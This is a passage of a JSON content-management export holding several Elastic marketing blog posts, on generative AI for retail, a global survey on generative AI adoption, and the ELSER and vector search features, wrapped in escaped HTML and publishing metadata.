Elastic includes native support for \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/authorization.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003erole-based and attribute-based access control\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to ensure that only those roles with access to data can see it. By leveraging Elasticsearch, your organization can effectively meet the requirement of granting access to privileged individuals for specific documents. This ensures that your organization maintains comprehensive privacy and access controls across all its search applications. Ensuring the highest level of privacy is crucial, making it imperative to keep all data within your organization's network. This not only becomes a top priority but also an obligation. ESRE offers the necessary tools to support your organization in implementing deployments within an air-gapped environment and facilitating secure network access, enabling you to safeguard your data effectively.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa73fa880a75ecedb"}}},{"video":{"vidyard_uuid":"JbViktqzsHKA3ezJoh3Y8w","_metadata":{"uid":"cs2e415be87a3bd425"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":false,"hide_controls":false,"looping_animation":false}},{"title_text":{"title_text":[{"title_l10n":"Stay up to date on all things generative AI","_metadata":{"uid":"csaf4fc5c9a2007104"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWith the \u003ca href=\"https://www.elastic.co/lp/whats-possible-with-genai\" target=\"_self\"\u003emyriad of possibilities illuminated by generative AI\u003c/a\u003e, Elastic can significantly enhance the speed and efficiency of your adoption in this new era, allowing you to fully capitalize on and leverage the associated benefits. Stay informed on all things related to AI by \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search/generative-ai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esigning up\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to receive exclusive news, Elastic product updates, AI trends, hands-on demos, and more!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdca1eabffc86ecc9"}}},{"callout":{"title_l10n":"Additional resources:","_metadata":{"uid":"csd2a2a3770d81f5a8"},"paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/chatgpt-elasticsearch-openai-meets-private-data\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eChatGPT and Elasticsearch: OpenAI meets private data\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/enhancing-chatbot-capabilities-with-nlp-and-vector-search-in-elasticsearch\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEnhancing chatbot capabilities with NLP and vector search in Elasticsearch\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/overview-image-similarity-search-in-elastic\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOverview of image similarity search in Elasticsearch\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/introducing-elastic-ai-assistant\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic introduces Elastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/may-2023-launch-announcement\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIntroducing Elasticsearch Relevance Engine™ — Advanced search for the AI revolution\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/5-technical-components-image-similarity-search\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e5 technical components of image similarity search\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-deploy-natural-language-processing-nlp-getting-started\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow to deploy natural language processing (NLP): Getting started\u0026nbsp;\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/monitor-openai-api-gpt-models-opentelemetry-elastic\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMonitor OpenAI API and GPT models with OpenTelemetry and Elastic\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs63aa013b454b3174"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003e*Source: \u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://www.mckinsey.com/capabilities/mckinsey-digital/our-insights/the-economic-potential-of-generative-ai-the-next-productivity-frontier#introduction\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003ehttps://www.mckinsey.com/capabilities/mckinsey-digital/our-insights/the-economic-potential-of-generative-ai-the-next-productivity-frontier#introduction\u003c/em\u003e\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eIn this blog post, we may have used third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eElastic, Elasticsearch and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbbf401d70827329a"}}}],"publish_date":"2023-06-30","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt371b46b1f7be39e3","ACL":{},"created_at":"2020-06-17T03:24:44.114Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retail","label_l10n":"Retail","tags":[],"title":"Retail","updated_at":"2020-07-06T22:17:35.972Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.835Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb4928f8cf10d2cff","ACL":{},"created_at":"2023-11-06T21:35:16.245Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vector-search","label_l10n":"Vector search","tags":[],"title":"Vector search","updated_at":"2023-11-06T21:35:16.245Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.491Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltf4c040a3cb414ac0","ACL":{},"created_at":"2023-11-06T21:32:35.092Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"semantic-search","label_l10n":"Semantic search","tags":[],"title":"Semantic search","updated_at":"2023-11-06T21:32:35.092Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.425Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Natural Language Processing (NLP)","label_l10n":"Natural Language Processing (NLP)","keyword":"natural-language-processing","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt97696fc6e9921c30","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:43:16.119Z","updated_at":"2023-11-06T20:43:16.119Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:23:24.704Z","user":"blt4b2e1169881270a8"}},{"title":"Machine learning","label_l10n":"Machine learning","keyword":"machine-learning","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt65b9df038275be61","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:34.860Z","updated_at":"2020-06-17T03:38:46.799Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:34.860Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-01T17:16:32.546Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":1,"is_dir":false,"uid":"bltafa0e0e69618e170","ACL":{},"content_type":"image/png","created_at":"2023-06-29T18:56:42.997Z","created_by":"bltb6c155cd84fc0c1a","file_size":"168980","filename":"elastic-blog-header-image-gai.png","parent_uid":null,"tags":[],"title":"elastic-blog-header-image-gai.png","updated_at":"2023-06-29T18:56:42.997Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-30T14:00:00.572Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltafa0e0e69618e170/649dd3ebb93cad2886a70ada/elastic-blog-header-image-gai.png"},"title":"The power of generative AI for retail and CPG","title_l10n":"The power of generative AI for retail and CPG","updated_at":"2025-02-06T02:43:31.626Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/generative-ai-retail-cpg","publish_details":{"time":"2025-02-06T02:43:36.951Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt44baa28a6d15a8dd","_version":9,"locale":"en-us","ACL":{},"abstract_l10n":"We are excited to announce the release of The Elastic Generative AI Report, which reveals the expectations and challenges of early generative AI implementation worldwide.","author":["blt5c86d49ed98f9f2d"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-03-26T16:20:12.220Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs82d15111d6f77d9a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe are excited to announce the release of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pdf/platform/global-generative-ai-adoption-study.pdf\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe Elastic Generative AI Report\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which reveals the expectations and challenges of early \u003ca href=\"https://www.elastic.co/lp/whats-possible-with-genai\" target=\"_self\"\u003egenerative AI implementation\u003c/a\u003e worldwide. The report, produced in collaboration with Vanson Bourne, compiles data points and industry insights of 3,200 decision-makers and influencers working in IT, analytics, and data across 10 countries.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe sought to understand how organizations are currently approaching generative AI, what challenges they’re facing, the strategies they’re using, and what opportunities they’ve identified. The survey included responses from the US, UK, France, Germany, Singapore, India, Australia, Spain, Netherlands, and Japan.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eNot surprisingly, the survey shows that generative AI is at the forefront of organizational plans to innovate, grow, and improve operational efficiencies. However, it also reveals deep concerns around the security and privacy of generative AI technologies, ensuring data quality to feed the models is available, the growing disparate AI regulation globally, and the need for more specialized in-house AI skills.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e[\u003c/span\u003e\u003ca href=\"https://www.elastic.co/pdf/platform/global-generative-ai-adoption-study.pdf\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGET THE FULL REPORT\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e]\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"99% of respondents said generative AI would drive transformational change in their organization","_metadata":{"uid":"csbee3a97b2b35d2a2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u0026nbsp;The potential benefits cited by respondents for using generative AI were primarily:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImproved resource use — such as employee time and workload — operational efficiency, and increased employee productivity\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe opportunity to provide more engaging, personalized customer experiences\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHowever, organizations are at all ends of the spectrum when it comes to adopting generative AI technology — some have fully embraced it, others are in the trial phase, and some are just starting.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe survey indicates that India is the furthest ahead in implementing generative AI. India’s large services industry and the need for real-time, actionable insights could explain the high adoption numbers — 81% of respondents in the country cited generative AI was used in some way. Singapore is a close second in terms of adoption numbers (63%), with Spain not far behind (57%). Australia also signaled strong interest in rapidly adopting generative AI tools, reporting the highest number of organizations that are still trialing generative AI.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Generative AI’s data problem","_metadata":{"uid":"cs05fe897ac7a394cc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOne primary concern is data quality. Generative AI models rely on the data that feeds them. Organizations must have sufficient quality data to train the models, and many do not.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn part, this is down to the need for access controls and data being stored across multiple systems for security purposes, which keeps the data siloed. Nearly 75% of those surveyed reported that viewing data across all environments is a key difficulty for their organization. This slows data-based insights and doesn’t allow organizations to use their data wisely — or in generative AI models.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3c97af01b5048d0f"}}},{"quotes":{"quote_l10n":"But the quality of the data is critically important because […] if the quality of the data is no good, [GenAI models] are not going to give you the right outcome. And so, having good quality data that is easily accessible is critically important. Not something that many organizations have.","_metadata":{"uid":"csb955c0ec5c29859a"},"quote_author_l10n":"COO of a financial services firm in Australia","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf9bda098eafc6275"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWith search powered AI, organizations can overcome many of the challenges they face with data silos. Pairing search with generative AI can result in high-quality search results that are accurate, current, relevant, and derived from real-time data. It also ensures results and information are presented with business context, in simple language for users and customers. The combination allows organizations to make sense of their data and ultimately make better-informed decisions.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBut many organizations lack the search capabilities to gather actionable insights effectively. Whether they struggle to use their search results or their current search engine is unable to cover multiple data sources, organizations are now eyeing a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/retail-elasticsearch-relevance-engine-google-cloud-generative-ai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003econversational search experience\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e powered by generative AI and natural language processing. Almost half of respondents believe their organization could save at least two days per week per employee if they could conversationally search their organizational data.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAre organizations working toward a search powered AI solution? How are they overcoming the other challenges of adopting generative AI? \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pdf/platform/global-generative-ai-adoption-study.pdf\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRead the entire report\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, full of insights into how global organizations view generative AI, address security concerns, and adapt to new search and AI technologies.\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eDownload \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/pdf/platform/global-generative-ai-adoption-study.pdf\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eThe Elastic Generative AI Report\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e, and \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/platform/generative-ai-adoption-survey\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003etake the quiz\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e to see where you are in your generative AI adoption journey.\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csff37cbf9962c09e7"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs45b820733c7a279d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5f6431609cb5e277"}}}],"publish_date":"2024-03-26T16:14:33.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"The Elastic Generative AI Report looks at how organizations are adopting generative AI.","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"title":"Machine learning","label_l10n":"Machine learning","keyword":"machine-learning","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt65b9df038275be61","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:34.860Z","updated_at":"2020-06-17T03:38:46.799Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:34.860Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-01T17:16:32.546Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","title":"Natural Language Processing (NLP)","label_l10n":"Natural Language Processing (NLP)","keyword":"natural-language-processing","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt97696fc6e9921c30","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:43:16.119Z","updated_at":"2023-11-06T20:43:16.119Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:23:24.704Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt5ebb3c17304b01bc","ACL":{},"created_at":"2023-11-06T20:47:38.117Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"privacy-first-ai","label_l10n":"Privacy-first AI","tags":[],"title":"Privacy-first AI","updated_at":"2023-11-06T20:47:38.117Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:58.404Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb4928f8cf10d2cff","ACL":{},"created_at":"2023-11-06T21:35:16.245Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vector-search","label_l10n":"Vector search","tags":[],"title":"Vector search","updated_at":"2023-11-06T21:35:16.245Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.491Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt1718ed27c03cc3fc","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-03-26T16:15:44.284Z","updated_at":"2024-03-26T16:15:44.284Z","content_type":"image/jpeg","file_size":"23969","filename":"Maze_entryway.jpg","title":"Maze_entryway.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-03-26T16:32:32.195Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1718ed27c03cc3fc/6602f4b0db68ba8af639eb00/Maze_entryway.jpg"},"title":"The state of generative AI: Our global survey of over 3,000 tech leaders","title_l10n":"The state of generative AI: Our global survey of over 3,000 tech leaders","updated_at":"2025-02-06T02:37:19.747Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/generative-ai-adoption-survey","publish_details":{"time":"2025-02-06T02:39:00.476Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt9f77a777ea0b81d9","_version":14,"locale":"en-us","ACL":{},"abstract_l10n":"Explore how Elastic's easy-to-use machine learning model ELSER, now generally available, and capabilities like scalar quantization and the Inference API simplify model selection and scale production-ready search experiences. ","author":["blt6f8c1e29600b488b"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-03-21T19:08:26.519Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5ef44f6e2064db67"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDaily breakthroughs in large language models (LLMs) and generative AI have put developers at the forefront of the movement, influencing its direction and \u003ca href=\"https://www.elastic.co/lp/whats-possible-with-genai\" target=\"_self\"\u003epossibilities\u003c/a\u003e. In this blog, I’ll share how Elastic's search customers are using Elastic's vector database and open platform for search powered AI and developer tools to accelerate and scale generative AI experiences, giving them new avenues for growth.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eResults from a recent developer survey conducted by Dimensional Research and supported by Elastic indicate that \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e87% of developers already have a use case for generative AI — whether it’s data analysis, \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/cisco\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ecustomer support\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e, workplace search, or \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/chatleap\"\u003e\u003cspan style=\"font-size: 